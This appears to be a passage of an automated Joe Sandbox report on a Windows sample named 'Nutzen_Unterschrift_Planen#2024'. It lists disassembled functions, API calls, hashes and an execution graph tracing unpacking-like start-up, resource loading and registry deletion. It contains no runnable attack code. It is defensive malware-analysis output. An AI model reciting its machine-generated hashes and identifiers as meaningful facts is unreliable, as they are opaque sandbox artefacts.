                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                            • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                            Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                            • String ID: _lng.ini
                                                            • API String ID: 383090722-1948609170
                                                            • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                            • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                            Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                            • API String ID: 2773794195-880857682
                                                            • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                            • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                            Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                            • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LongWindow
                                                            • String ID: MZ@
                                                            • API String ID: 1378638983-2978689999
                                                            • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                            • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                            • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                            • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                            Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                            • memset.MSVCRT ref: 0042BAAE
                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                            • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                            Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$memset
                                                            • String ID:
                                                            • API String ID: 1860491036-0
                                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                            Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                            • free.MSVCRT ref: 0040A908
                                                            • free.MSVCRT ref: 0040A92B
                                                            • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$memcpy$mallocwcslen
                                                            • String ID:
                                                            • API String ID: 726966127-0
                                                            • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                            • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                            Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                            • free.MSVCRT ref: 0040B201
                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                            • free.MSVCRT ref: 0040B224
                                                            • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$memcpy$mallocwcslen
                                                            • String ID:
                                                            • API String ID: 726966127-0
                                                            • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                            • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                            Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID:
                                                            • API String ID: 231171946-0
                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                            Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strlen.MSVCRT ref: 0040B0D8
                                                            • free.MSVCRT ref: 0040B0FB
                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                            • free.MSVCRT ref: 0040B12C
                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$memcpy$mallocstrlen
                                                            • String ID:
                                                            • API String ID: 3669619086-0
                                                            • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                            • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                            Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                            • malloc.MSVCRT ref: 00417407
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                            • free.MSVCRT ref: 00417425
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$freemalloc
                                                            • String ID:
                                                            • API String ID: 2605342592-0
                                                            • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                            • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                            Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcslen$wcscat$wcscpy
                                                            • String ID:
                                                            • API String ID: 1961120804-0
                                                            • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                            • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                            Execution Graph

                                                            Execution Coverage:2.5%
                                                            Dynamic/Decrypted Code Coverage:19.7%
                                                            Signature Coverage:0.5%
                                                            Total number of Nodes:876
                                                            Total number of Limit Nodes:22
                                                            execution_graph 34108 40fc40 70 API calls 34281 403640 21 API calls 34109 427fa4 42 API calls 34282 412e43 _endthreadex 34283 425115 76 API calls 34284 43fe40 133 API calls 34112 425115 83 API calls 34113 401445 memcpy memcpy DialogBoxParamA 34114 440c40 34 API calls 34116 411853 RtlInitializeCriticalSection memset 34117 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34290 40a256 13 API calls 34292 432e5b 17 API calls 34294 43fa5a 20 API calls 34119 401060 41 API calls 34297 427260 CloseHandle memset memset 33167 410c68 FindResourceA 33168 410c81 SizeofResource 33167->33168 33171 410cae 33167->33171 33169 410c92 LoadResource 33168->33169 33168->33171 33170 410ca0 LockResource 33169->33170 33169->33171 33170->33171 34299 405e69 14 API calls 34124 433068 15 API calls 34301 414a6d 18 API calls 34302 43fe6f 134 API calls 34126 424c6d 15 API calls 34303 426741 19 API calls 34128 440c70 17 API calls 34129 443c71 44 API calls 34132 427c79 24 API calls 34306 416e7e memset 34136 42800b 47 API calls 34137 425115 85 API calls 34309 41960c 61 API calls 34138 43f40c 122 API calls 34141 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34142 43f81a 20 API calls 34144 414c20 memset memset 34145 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34313 414625 18 API calls 34314 404225 modf 34315 403a26 strlen WriteFile 34317 40422a 12 API calls 34321 427632 memset memset memcpy 34322 40ca30 59 API calls 34323 404235 26 API calls 34146 42ec34 61 API calls 34147 425115 76 API calls 34324 425115 77 API calls 34326 44223a 38 API calls 34153 43183c 112 API calls 34327 44b2c5 _onexit __dllonexit 34332 42a6d2 memcpy 34155 405cda 65 API calls 34340 43fedc 138 API calls 34341 4116e1 16 API calls 34158 4244e6 19 API calls 34160 42e8e8 127 API calls 34161 4118ee RtlLeaveCriticalSection 34346 43f6ec 22 API calls 34163 425115 119 API calls 33157 410cf3 EnumResourceNamesA 34349 4492f0 memcpy memcpy 34351 43fafa 18 API calls 34353 4342f9 15 API calls 34164 4144fd 19 API calls 34355 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34356 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34359 443a84 _mbscpy 34361 43f681 17 API calls 34167 404487 22 API calls 34363 415e8c 16 API calls 34171 411893 RtlDeleteCriticalSection 34172 41a492 42 API calls 34367 403e96 34 API calls 34368 410e98 memset SHGetPathFromIDList SendMessageA 34174 426741 109 API calls 34175 4344a2 18 API calls 34176 4094a2 10 API calls 34371 4116a6 15 API calls 34372 43f6a4 17 API calls 34373 440aa3 20 API calls 34375 427430 45 API calls 34179 4090b0 7 API calls 34180 4148b0 15 API calls 34182 4118b4 RtlEnterCriticalSection 34183 4014b7 CreateWindowExA 34184 40c8b8 19 API calls 34186 4118bf RtlTryEnterCriticalSection 34380 42434a 18 API calls 34382 405f53 12 API calls 34194 43f956 59 API calls 34196 40955a 17 API calls 34197 428561 36 API calls 34198 409164 7 API calls 34386 404366 19 API calls 34390 40176c ExitProcess 34393 410777 42 API calls 34203 40dd7b 51 API calls 34204 425d7c 16 API calls 34395 43f6f0 25 API calls 34396 42db01 22 API calls 34205 412905 15 API calls 34397 403b04 54 API calls 34398 405f04 SetDlgItemTextA GetDlgItemTextA 34399 44b301 ??3@YAXPAX 34402 4120ea 14 API calls 34403 40bb0a 8 API calls 34405 413f11 strcmp 34209 434110 17 API calls 34212 425115 108 API calls 34406 444b11 _onexit 34214 425115 76 API calls 34217 429d19 10 API calls 34409 444b1f __dllonexit 34410 409f20 _strcmpi 34219 42b927 31 API calls 34413 433f26 19 API calls 34414 44b323 FreeLibrary 34415 427f25 46 API calls 34416 43ff2b 17 API calls 34417 43fb30 19 API calls 34226 414d36 16 API calls 34228 40ad38 7 API calls 34419 433b38 16 API calls 34099 44b33b 34100 44b344 ??3@YAXPAX 34099->34100 34101 44b34b 34099->34101 34100->34101 34102 44b354 ??3@YAXPAX 34101->34102 34103 44b35b 34101->34103 34102->34103 34104 44b364 ??3@YAXPAX 34103->34104 34105 44b36b 34103->34105 34104->34105 34106 44b374 ??3@YAXPAX 34105->34106 34107 44b37b 34105->34107 34106->34107 34232 426741 21 API calls 34233 40c5c3 125 API calls 34235 43fdc5 17 API calls 34420 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34238 4161cb memcpy memcpy memcpy memcpy 33172 44b3cf 33173 44b3e6 33172->33173 33178 44b454 33172->33178 33173->33178 33185 44b40e GetModuleHandleA 33173->33185 33175 44b45d GetModuleHandleA 33179 44b467 33175->33179 33176 44b49a 33198 44b49f 33176->33198 33178->33175 33178->33176 33178->33179 33179->33178 33180 44b487 GetProcAddress 33179->33180 33180->33178 33181 44b405 33181->33178 33181->33179 33182 44b428 GetProcAddress 33181->33182 33182->33178 33183 44b435 VirtualProtect 33182->33183 33183->33178 33184 44b444 VirtualProtect 33183->33184 33184->33178 33186 44b417 33185->33186 33188 44b454 33185->33188 33217 44b42b GetProcAddress 33186->33217 33190 44b45d GetModuleHandleA 33188->33190 33191 44b49a 33188->33191 33197 44b467 33188->33197 33189 44b41c 33189->33188 33193 44b428 GetProcAddress 33189->33193 33190->33197 33192 44b49f 778 API calls 33191->33192 33192->33191 33193->33188 33194 44b435 VirtualProtect 33193->33194 33194->33188 33195 44b444 VirtualProtect 33194->33195 33195->33188 33196 44b487 GetProcAddress 33196->33188 33197->33188 33197->33196 33199 444c4a 33198->33199 33200 444c56 GetModuleHandleA 33199->33200 33201 444c68 __set_app_type __p__fmode __p__commode 33200->33201 33203 444cfa 33201->33203 33204 444d02 __setusermatherr 33203->33204 33205 444d0e 33203->33205 33204->33205 33226 444e22 _controlfp 33205->33226 33207 444d13 _initterm __getmainargs _initterm 33208 444d6a GetStartupInfoA 33207->33208 33210 444d9e GetModuleHandleA 33208->33210 33227 40cf44 33210->33227 33214 444dcf _cexit 33216 444e04 33214->33216 33215 444dc8 exit 33215->33214 33216->33176 33218 44b454 33217->33218 33219 44b435 VirtualProtect 33217->33219 33221 44b45d GetModuleHandleA 33218->33221 33222 44b49a 33218->33222 33219->33218 33220 44b444 VirtualProtect 33219->33220 33220->33218 33225 44b467 33221->33225 33223 44b49f 778 API calls 33222->33223 33223->33222 33224 44b487 GetProcAddress 33224->33225 33225->33218 33225->33224 33226->33207 33278 404a99 LoadLibraryA 33227->33278 33229 40cf60 33266 40cf64 33229->33266 33286 410d0e 33229->33286 33231 40cf6f 33290 40ccd7 ??2@YAPAXI 33231->33290 33233 40cf9b 33304 407cbc 33233->33304 33238 40cfc4 33322 409825 memset 33238->33322 33239 40cfd8 33327 4096f4 memset 33239->33327 33244 40d181 ??3@YAXPAX 33246 40d1b3 33244->33246 33247 40d19f DeleteObject 33244->33247 33245 407e30 _strcmpi 33248 40cfee 33245->33248 33351 407948 free free 33246->33351 33247->33246 33250 40cff2 RegDeleteKeyA 33248->33250 33251 40d007 EnumResourceTypesA 33248->33251 33250->33244 33253 40d047 33251->33253 33254 40d02f MessageBoxA 33251->33254 33252 40d1c4 33352 4080d4 free 33252->33352 33256 40d0a0 CoInitialize 33253->33256 33332 40ce70 33253->33332 33254->33244 33349 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33349 33258 40d1cd 33353 407948 free free 33258->33353 33261 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33350 40c256 PostMessageA 33261->33350 33263 40d061 ??3@YAXPAX 33263->33246 33267 40d084 DeleteObject 33263->33267 33264 40d09e 33264->33256 33266->33214 33266->33215 33267->33246 33270 40d0f9 GetMessageA 33271 40d17b CoUninitialize 33270->33271 33272 40d10d 33270->33272 33271->33244 33273 40d113 TranslateAccelerator 33272->33273 33275 40d145 IsDialogMessage 33272->33275 33276 40d139 IsDialogMessage 33272->33276 33273->33272 33274 40d16d GetMessageA 33273->33274 33274->33271 33274->33273 33275->33274 33277 40d157 TranslateMessage DispatchMessageA 33275->33277 33276->33274 33276->33275 33277->33274 33279 404ac4 GetProcAddress 33278->33279 33280 404aec 33278->33280 33281 404ad4 33279->33281 33282 404add FreeLibrary 33279->33282 33284 404b13 33280->33284 33285 404afc MessageBoxA 33280->33285 33281->33282 33282->33280 33283 404ae8 33282->33283 33283->33280 33284->33229 33285->33229 33287 410d17 LoadLibraryA 33286->33287 33288 410d3c 33286->33288 33287->33288 33289 410d2b GetProcAddress 33287->33289 33288->33231 33289->33288 33291 40cd08 ??2@YAPAXI 33290->33291 33293 40cd26 33291->33293 33294 40cd2d 33291->33294 33361 404025 6 API calls 33293->33361 33296 40cd66 33294->33296 33297 40cd59 DeleteObject 33294->33297 33354 407088 33296->33354 33297->33296 33299 40cd6b 33357 4019b5 33299->33357 33302 4019b5 strncat 33303 40cdbf _mbscpy 33302->33303 33303->33233 33363 407948 free free 33304->33363 33308 407a1f malloc memcpy free free 33311 407cf7 33308->33311 33309 407ddc 33317 407e04 33309->33317 33376 407a1f 33309->33376 33311->33308 33311->33309 33312 407d7a free 33311->33312 33311->33317 33367 40796e 7 API calls 33311->33367 33368 406f30 33311->33368 33312->33311 33364 407a55 33317->33364 33318 407e30 33319 407e57 33318->33319 33320 407e38 33318->33320 33319->33238 33319->33239 33320->33319 33321 407e41 _strcmpi 33320->33321 33321->33319 33321->33320 33382 4097ff 33322->33382 33324 409854 33387 409731 33324->33387 33328 4097ff 3 API calls 33327->33328 33329 409723 33328->33329 33407 40966c 33329->33407 33421 4023b2 33332->33421 33338 40ced3 33510 40cdda 7 API calls 33338->33510 33339 40cece 33342 40cf3f 33339->33342 33462 40c3d0 memset GetModuleFileNameA strrchr 33339->33462 33342->33263 33342->33264 33345 40ceed 33489 40affa 33345->33489 33349->33261 33350->33270 33351->33252 33352->33258 33353->33266 33362 406fc7 memset _mbscpy 33354->33362 33356 40709f CreateFontIndirectA 33356->33299 33358 4019e1 33357->33358 33359 4019c2 strncat 33358->33359 33360 4019e5 memset LoadIconA 33358->33360 33359->33358 33360->33302 33361->33294 33362->33356 33363->33311 33365 407a65 33364->33365 33366 407a5b free 33364->33366 33365->33318 33366->33365 33367->33311 33369 406f37 malloc 33368->33369 33370 406f7d 33368->33370 33372 406f73 33369->33372 33373 406f58 33369->33373 33370->33311 33372->33311 33374 406f6c free 33373->33374 33375 406f5c memcpy 33373->33375 33374->33372 33375->33374 33377 407a38 33376->33377 33378 407a2d free 33376->33378 33379 406f30 3 API calls 33377->33379 33380 407a43 33378->33380 33379->33380 33381 40796e 7 API calls 33380->33381 33381->33317 33398 406f96 GetModuleFileNameA 33382->33398 33384 